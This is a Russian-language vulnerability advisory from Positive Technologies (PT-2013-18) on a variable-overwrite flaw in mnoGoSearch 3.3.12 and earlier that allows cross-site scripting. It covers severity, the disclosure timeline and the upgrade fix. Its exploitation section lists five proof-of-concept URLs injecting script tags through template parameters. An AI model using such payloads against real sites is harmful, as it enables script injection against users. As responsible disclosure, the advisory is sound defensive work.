Positive Technologies
Средний4.3
(AV:N/AC:M/Au:N/C:N/I:P/A:N)

PT-2013-18: Перезапись переменных в mnoGoSearch

(PT-2013-18) Positive Technologies Security Advisory
Перезапись переменных в mnoGoSearch

Уязвимое ПО

mnoGoSearch
Версия: 3.3.12 и более ранняя

Ссылка: 
http://www.mnogosearch.org/

Рейтинг опасности

Уровень опасности: средний 
Воздействие: межсайтовое выполнение сценариев
Вектор атаки: удаленный

CVSS v2: 
Base Score: 4.3 
Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N) 

CVE: отсутствует

Описание программы

mnoGoSearch - универсальная поисковая система для локальных и глобальных серверов.

Описание уязвимости

Специалисты исследовательского центра компании Positive Technologies обнаружили уязвимость "Межсайтовое выполнение сценариев" в приложении mnoGoSearch.

Из-за некорректной архитектуры приложения все переменные шаблона и переменные, переданные клиентом, хранятся в одном списке. Это позволяет перезаписать любые неинициализированные параметры, используемые в шаблоне. Перезапись параметров, отображаемых на странице без предварительной обработки, приводит к множественным уязвимостям типа "Межсайтовое выполнение сценариев".

Пример эксплуатации

http://www.mnogosearch.org/search/index.html?q=x&STORED=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=x&CL=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&cc=1&Charset=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E
http://www.mnogosearch.org/search/index.html?q=a&ResultContentType=text/html%0A%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E http://www.mnogosearch.org/search/index.html?q=aaa&total=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E&a=a

Решение

Установите последнюю версию приложения.

Статус уведомления

15.02.2013 - Производителю отправлены детали уязвимости
01.03.2013 - Производитель выпустил исправление
05.03.2013 - Публикация уязвимости

Благодарности

Уязвимость обнаружил Сергей Бобров (Исследовательcкий центр Positive Research компании Positive Technologies)


Ссылки

http://www.securitylab.ru/lab/PT-2013-18
http://www.mnogosearch.org/bugs/index.php?id=4819

Список отчетов о ранее обнаруженных уязвимостях Positive Research:

http://www.ptsecurity.ru/lab/advisory/
http://www.securitylab.ru/lab/

О Positive Technologies

Positive Technologies www.ptsecurity.ru - одна из ведущих российских компаний в области информационной безопасности. 
Основные направления деятельности компании - разработка систем комплексного мониторинга информационной безопасности (XSpider, MaxPatrol); предоставление консалтинговых и сервисных услуг в области информационной безопасности; развитие специализированного портала Securitylab.ru.

Заказчиками Positive Technologies являются более 40 государственных учреждений, более 50 банков и финансовых структур, 20 телекоммуникационных компаний, более 40 промышленных предприятий, компании ИТ-индустрии, сервисные и ритейловые компании России, стран СНГ, Балтии, а также Великобритании, Германии, Голландии, Израиля, Ирана, Китая, Мексики, США, Таиланда, Турции, Эквадора, ЮАР, Японии.

Positive Technologies - это команда высококвалифицированных разработчиков, консультантов и экспертов, которые обладают большим практическим опытом, имеют профессиональные звания и сертификаты, являются членами международных организаций и активно участвуют в развитии отрасли.